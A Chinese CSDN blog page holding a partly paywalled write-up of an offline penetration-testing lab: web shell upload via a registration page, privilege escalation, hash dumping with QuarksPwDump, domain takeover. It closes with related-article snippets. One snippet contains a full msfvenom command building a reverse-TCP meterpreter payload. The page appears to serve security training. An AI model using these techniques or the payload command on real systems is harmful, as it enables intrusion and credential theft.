单机靶场练习(三)(含域)

最新推荐文章于 2024-04-29 03:13:59 发布
最新推荐文章于 2024-04-29 03:13:59 发布
阅读量587 收藏
点赞数 1
文章标签: 靶场练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kdhoi/article/details/103258421
版权
这篇博客详细记录了一次靶场练习的过程,从设置虚拟机环境开始,通过发现并利用V9.6.0网站的会员注册页面漏洞上传大马文件,逐步获取权限。在获取低权限后,通过上传提权文件提升至最高权限,使用QuarksPwDump.exe抓取密码hash,并成功解密。进一步的信息收集和弱口令尝试,使作者连接到另一台主机并发现域账户。最终,通过提权成为域管理员,完成整个渗透测试挑战。
摘要由CSDN通过智能技术生成

目录

实验靶场练习

需要工具

VMWARE Workstation 15 Player

搭建环境

1.设置虚拟机的网卡为.NAT模式
2.调整物理机网卡vment8ip 为100网段

实验信息

ip地址为192.168.100.100

实验要求

一步一步拿到域管密码

靶场网址

链接:https://pan.baidu.com/s /1_Ve132hubzy8DrBd4oDYCA
提取码:xgfi

实验步骤

1、测试网站可访问性
在这里插入图片描述2、查看版本为V9.6.0,网上查看版本漏洞,发现在会员注册页面可以通过burpsuite抓包上传文件,果断试了试上传大马文件。
在这里插入图片描述3、发现没有回显,自己的环境就登录上看到文件已经上传进去,直接物理机访问。
在这里插入图片描述

最低0.47元/天 解锁文章
kdhoi
关注
单机靶场练习
weixin_45906318的博客
11-21 600
目录实验靶场练习笔记需要工具搭建环境实验信息实验要求靶场网址项目实施5)尝试一下远程桌面连接 实验靶场练习笔记 需要工具 VMWARE Workstation 15 Player 搭建环境 1.设置虚拟机网卡为NAT模式 2.调整物理机网卡vment8ip为100网段 实验信息 ip地址为192.168.100.100 实验要求 在环境中找出3个flag 靶场网址 项目实施 页面 信息收集 ...
单机靶场练习报告
longwsq的博客
11-20 341
目录单机靶场练习报告实验准备使用工具实验结果实验过程信息收集getshell获取哈希值开3389hydra爆破密码 单机靶场练习报告 实验准备 vmware导入两台靶场并开机,靶机下载地址https://pan.baidu.com/s/1xd8MdGwqZqErtvu0QO5d5A 提取码 xbb5 然后配置物理机网卡的vmnet8ip 为100网段,192.168.100.1。 使用工具 V...
单机靶场实验
weixin_45906318的博客
11-21 514
目录实验靶场练习笔记需要工具搭建环境实验信息实验要求靶场网址项目实施 实验靶场练习笔记 需要工具 VMWARE Workstation 15 Player 搭建环境 1.设置虚拟机网卡为NAT模式 2.调整物理机网卡vment8ip为100网段 实验信息 ip地址为192.168.100.100 实验要求 在环境中找出3个flag 靶场网址 https://pan.baidu.com/s/1x...
单机靶场练习(二)
kdhoi的博客
11-22 459
目录实验靶场练习需要工具搭建环境实验信息实验要求靶场网址实验步骤 实验靶场练习 需要工具 VMWARE Workstation 15 Player 搭建环境 1.设置虚拟机的网卡为.NAT模式 2.调整物理机网卡vment8ip 为100网段 实验信息 ip地址为192.168.100.131 实验要求 在环境中找出3个flag 靶场网址 网址:https://pan.baidu.com/s/17...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
vulnstack域环境靶场(一)
BROTHERYY的博客
11-08 1202
一、环境介绍: 1.拓扑结构 2.环境搭建 这里我多使用了一个win7的虚拟机作为攻击机,使用的vm1网卡。 二、信息搜集 1.敏感信息泄漏 phpinfo默认页面 2.数据库弱口令 3.目录爆破 、漏洞利用 1.利用phpmyadmin日志写入shell 2.利用网站后台getshell 访问该网站以后发现公告信息处有信息泄漏 点击前台模板进入以后点击新建,可以写入一个shell,也可以直接修改当前的模板 不知道目录路径,百度一下yxcms的目录 3.上传cs后门 设置好监听
vulnstack域环境靶场
BROTHERYY的博客
12-01 852
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
VulnStack域环境靶场渗透(一)
qq_43590351的博客
09-20 1483
红日靶场一 msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.31.229 LPORT=4444 -f exe -o msf1.exe 实验环境 web服务器 192.168.31.79192.168.52.143 域成员server2003 192.168.52.141 域控server2008 192.168.52.138 物理机 192.168.31.238 kali-vps 192.168.31.229
Vulnstack红日安全内网域渗透靶场1实战
热门推荐
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
0x02 - 虚拟靶场环境搭建
wkh_0506的博客
01-28 825
0x02 - 虚拟靶场环境搭建
自主搭建的层网络域渗透靶场打靶记录
Innocence_0的博客
08-01 874
假期马上结束了,闲暇之时我自己尝试着搭建了一个内网渗透的靶场靶场是根据比较新的漏洞进行搭建的,质量自以为还可以。文中若有不当之处还请各位大佬多多点评公众号:WHOAMIAnony整个靶场的网络环境分为层。从最初的信息收集、外网初探、攻入内网、搭建代理,横向移动,最终拿下域控。端口扫描端口服务识别漏洞搜索与利用Laravel Debug mode RCE(CVE-2021-3129)漏洞利用Docker逃逸通达OA v11.3 漏洞利用Linux环境变量提权Redis 未授权访问漏洞。
靶场练习--春秋云境-Brute4Road
NoooEmotion的博客
01-28 2220
Brute4Road是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
【内网安全】横向移动&Exchange服务&有账户CVE漏洞&无账户口令爆破
今天是几号的博客
03-30 1251
Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。简单而言,Exchange server可以被用来构架应用于企业、学校的邮件系统。Exchange是收费邮箱,但是国内微软并不直接出售Exchange邮箱,而是将Exchange、Lync、Sharepoint款产品包装成Office365出售。实验靶场环境:0day.org单域环境Win7 x64 0day.org PC-Jack 访问域主机地址。
内网靶场_从自做到拿下-自做篇
l805142479的博客
03-14 6039
内网靶场学习,从自己制作靶场到拿下靶场;从frp的隧道搭建,到cs利用frp的反向上线;
【XSS漏洞-02】XSS靶场介绍(含BlueLotus_XSSReceiver、DVWA、XSS-labs等)
m0_64378913的博客
05-13 2529
1 XSS靶场简介 XSS-labs:一款以练习测试XSS思路和命令的闯关游戏,主要是以反射型XSS漏洞为主。 DVWA:一个功能较全的靶场环境,漏洞类型齐全,包含在XSS种类型的漏洞,各有4个级别的破解难度。 BlueLotus_XSSReceiver:该源码是由清华大学蓝莲花战队的firesun编写,安装方便,功能强大。 2 DVWA靶场搭建过程 方法一:可以参考《Docker上搭建DVWA漏洞环境》。安装简单,但安装结果功能有所欠缺。 方法二:可以参考《WAMP环境+DVWA漏洞测试平台搭建过程》。
内网域渗透总结——红日靶场①_红日靶机账号密码
最新发布
2401_84301227的博客
04-29 326
外网:192.168.43.17内网:192.168.52.143可以Ping通外网通192.168.52.138(win2008)通192.168.52.141(win2003)小皮必须是自带的,下载的新版本会导致kali机连接目标失败问题原理:自行理解内网两台不出网win互通win7开启phpstudywin11访问80端口得到phpstudy探针#发现开启了80,3306端口#访问发现80端口是php探针。
红日-VulnStack靶场-ATT&CK(二)
braty_的博客
10-01 1063
红日二,cs横向移动
2021-7-7红日团队靶场
qq_45290991的博客
07-16 1万+
这是第二次打靶场,也是实战第一次。写的比较详(luo)细(suo),看官莫怪。期间参考了很多资料,后来我也看了好几个,觉得谢公子大佬写的最详细,这里安利一波大佬神文:谢公子红日靶场一 一、环境配置 首先感谢红日安全团队分享的靶机实战环境。红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客位一体学习。 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ 本文的目的是为了记录和巩固知识点,并分享出来,希望对大家能有所帮助。
vulhub靶场练习
07-28
回答: Vulhub靶场是一个用于漏洞学习和实践的平台,提供了各种常见漏洞的环境供用户进行实验和学习。在Vulhub靶场中,你可以学习和实践Apache换行解析漏洞(CVE-2017-15715)、Apache多后缀解析漏洞(apache_parsing...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值